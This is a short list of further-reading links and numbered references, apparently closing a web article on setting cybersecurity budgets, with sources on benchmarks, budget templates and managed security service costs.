Additional Resources

CISO Lens Benchmark: https://www.cisolens.com/benchmark

Prosegur Cyber Budget Report: https://cipher.com/blog/three-approaches-to-setting-cyber-security-budgets/

Cynet Cyber Budget Template: https://go.cynet.com/the-ultimate-security-budget-template

RSI MSSP Budgeting: https://blog.rsisecurity.com/how-much-does-managed-security-services-cost/#:~:text=When%20looking%20for%20a%20managed,dollars%20per%20user%20per%20month.


[1] https://www.cisolens.com/benchmark

[2] https://cipher.com/blog/three-approaches-to-setting-cyber-security-budgets/

[3] https://go.cynet.com/the-ultimate-security-budget-template

[4] https://blog.rsisecurity.com/how-much-does-managed-security-services-cost/#:~:text=When%20looking%20for%20a%20managed,dollars%20per%20user%20per%20month.

[5] https://www.aph.gov.au/About_Parliament/Parliamentary_Departments/Parliamentary_Library/pubs/rp/rp1819/SmallBusinessSector


Stay Up to Date

Latest News